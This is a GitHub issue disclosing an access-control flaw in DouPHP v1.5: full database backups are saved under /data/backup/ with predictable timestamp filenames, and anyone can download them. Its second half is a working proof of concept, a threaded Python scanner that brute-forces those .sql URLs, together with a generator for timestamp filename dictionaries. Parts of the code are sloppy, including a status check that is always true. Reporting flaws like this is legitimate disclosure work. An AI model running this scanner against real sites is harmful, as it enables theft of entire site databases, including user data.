Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Invalid identity authentication vulnerability, any user can view the download database backup file #1

Open
srsec opened this issue May 22, 2019 · 0 comments

Comments

Projects
None yet
1 participant
@srsec
Copy link
Owner

commented May 22, 2019

The latest version of DouPHP v1.5 Release 20190516, the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file.

1、Log in to the background and back up data through the data backup function,And generate a sql file in the format of the date.

image

2、We look at the path generated by the backup file.http://url/data/backup/D20190522T154247.sql

image

3、Any user can access the backup file path through the url, and can view the download backup file.

image

image

4、Backup file generation format (current date and time format file).
image


image
5、follow up ROOT_PATH,Check the core file and make no access restrictions on the backup file, resulting in a vulnerability.
image.
6、POC (Dict.txt needs to be customized to generate a dictionary in time format)。

import urllib.request
import time
import threading

url = input("url:")
txt = input("dict(dict.txt):")

open_url = []
all_url = []

threads = []
#Can be customized

def search_url(url,txt):
with open(txt,'r') as f:
for each in f:
each = each.replace('\n','')
urllist = url + each +'.sql'
all_url.append(urllist)

def handle_url(urllist):
print("Find:"+urllist+'\n')
try:
req = urllib.request.urlopen(urllist)
#Judgment return code
if req.getcode()==200 or 304:
open_url.append(urllist)
print("[+]Find file:"+urllist+'\n')
if req.getcode()==304:
print("[+]Find file:"+urllist+'\n')
open_url.append(urllist)
except:
pass

def main():
search_url(url,txt)

for each in all_url:
    t = threading.Thread(target = handle_url,args=(each,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

if open_url:
    print("Successful scan, successful url::")
    for each in open_url:
        print("[+]"+each)
else:
    print("There is a scan to the background of the website (maybe the dictionary is not enough to force)")

if name=="main":
#Judge program run time
start = time.clock()
main()
end = time.clock()
print("The function spend time is %.3f seconds" %(end-start))

7、Generate a specific date dictionary file script

import time
#Can be customized
for h in range(15,16):
for i in range(0,61):
for s in range(0,61):
if(h==0 and i==0 and s==0):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s)+'0',time.localtime(time.time()))
# print(data)
elif h==0 and i==0 and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>=10) and (s>0 and s<9):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time()))
elif i==0 and s==0 and (h>0 and h<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and ((i>0 and i<10)) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and s==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
elif h==0 and i==0 and (s>=10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+str(s),time.localtime(time.time()))
#print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
# print(data)
elif h==0 and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)
elif (h>0 and h<10) and (i>0 and i<10) and (s>0 and s<10):
data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
#print(data)

            elif (h>0 and h<10) and (s>0 and s<10):
                data=time.strftime('D%Y%m%dT'+'0'+str(h)+str(i)+'0'+str(s),time.localtime(time.time()))
                #print(data)
            elif (h>0 and h<10) and (s>0 and s<10) and (i>0 and i<10):
                data=time.strftime('D%Y%m%dT'+'0'+str(h)+'0'+str(i)+'0'+str(s),time.localtime(time.time()))
                #print(data)
            else:
                 data=time.strftime('D%Y%m%dT'+str(h)+str(i)+str(s),time.localtime(time.time()))
            print(data)

image

@srsec srsec changed the title Any user can view or now, the whole station database backup file 失效的身份认证漏洞,任意用户可以查看下载数据库备份文件 May 22, 2019

@srsec srsec changed the title 失效的身份认证漏洞,任意用户可以查看下载数据库备份文件 Shīxiào de shēnfèn rènzhèng lòudòng, rènyì yònghù kěyǐ chákàn xiàzài shùjùkù bèifèn wénjiàn 27/5000 Invalid identity authentication vulnerability, any user can view the download database backup file May 22, 2019

@srsec srsec changed the title Shīxiào de shēnfèn rènzhèng lòudòng, rènyì yònghù kěyǐ chákàn xiàzài shùjùkù bèifèn wénjiàn 27/5000 Invalid identity authentication vulnerability, any user can view the download database backup file Invalid identity authentication vulnerability, any user can view the download database backup file May 22, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.